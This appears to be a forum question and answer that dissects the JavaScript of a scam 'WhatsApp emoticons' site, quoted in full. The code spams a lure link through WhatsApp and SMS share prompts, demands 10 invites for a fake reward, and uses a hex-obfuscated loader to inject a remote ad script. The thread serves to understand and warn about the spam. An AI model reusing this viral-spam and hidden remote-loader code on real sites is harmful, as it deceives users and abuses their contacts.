So here is a malicious website trying to spam people into spreading their website further, which also leads to an advertisement - I suggest enabling noscript.
http://trucchiios.com/emoticon/index_en.php
Now I have the code here that gets executed when you push the big whatsapp button, but what does it do?
c = 0;
var image;
function fn1(x)
{
if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
// some code..
++c;
if (c <= 6)
{
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
if (c == 2) {
ga('send', 'event', 'WhatsApp', '1+ share', 'Emoticon EN');
} else if (c == 4) {
ga('send', 'event', 'WhatsApp', '3+ shares', 'Emoticon EN');
}
} else if (c <= 10) {
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
if (c == 7) {
ga('send', 'event', 'WhatsApp', 'more than 7 shares', 'Emoticon EN');
}
var head = document.getElementsByTagName('head').item(0);
var _0xc631 = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x73\x2E\x73\x70\x72\x69\x6E\x74\x72\x61\x64\x65\x2E\x63\x6F\x6D\x2F\x61\x64\x73\x63\x72\x69\x70\x74\x2E\x70\x68\x70\x3F\x70\x69\x64\x3D\x38\x36\x37\x33\x26\x6F\x72\x64\x3D\x5B\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x5D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
var script = document[_0xc631[1]](_0xc631[0]);
script[_0xc631[2]] = _0xc631[3];
script[_0xc631[4]] = _0xc631[5];
head[_0xc631[6]](script);
} else
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else {
window.alert("Please invite via your mobile browser");
}
}
function fn3(x) {
if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
// some code..
++c;
if (c <= 10) {
window.open("sms:?body=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
} else
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else {
window.alert("Please invite via your mobile browser");
}
}
function fn2(x) {
if (c >= 10)
{
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else
{
window.alert("To activate the new emoticons you have to invite at least 10 contacts. 10 friends or 3 groups. So far you've only invited " + c + " contacts.");
}
}
var n = 300,
t = setInterval(function() {
$("#countdown").text(n--), -1 == n && window.open("http://ads.sprintrade.com/adframe.php?pid=12649", "_self") & clearInterval(t)
}, 1e3);
I would just like someone to tell me what it does. I suspect it's just an adspam, not actual malware, but please take a look into it.
It seems this code is responsible for the increasing amount of spam messages received in the last week. I am quite sure this code is sending a link to malicious website using Whatsapp web:
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P [...]", "_self");
If using a mobile device,
if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {
Also tries to send a SMS:
"sms:?body=Check out the new WhatsApp animated emoticons :P [...]", "_self");
Some other addware sites are loaded when this code gets executed. This code seems to perform some other tasks, but it is hard to know. The script is written using Javascript.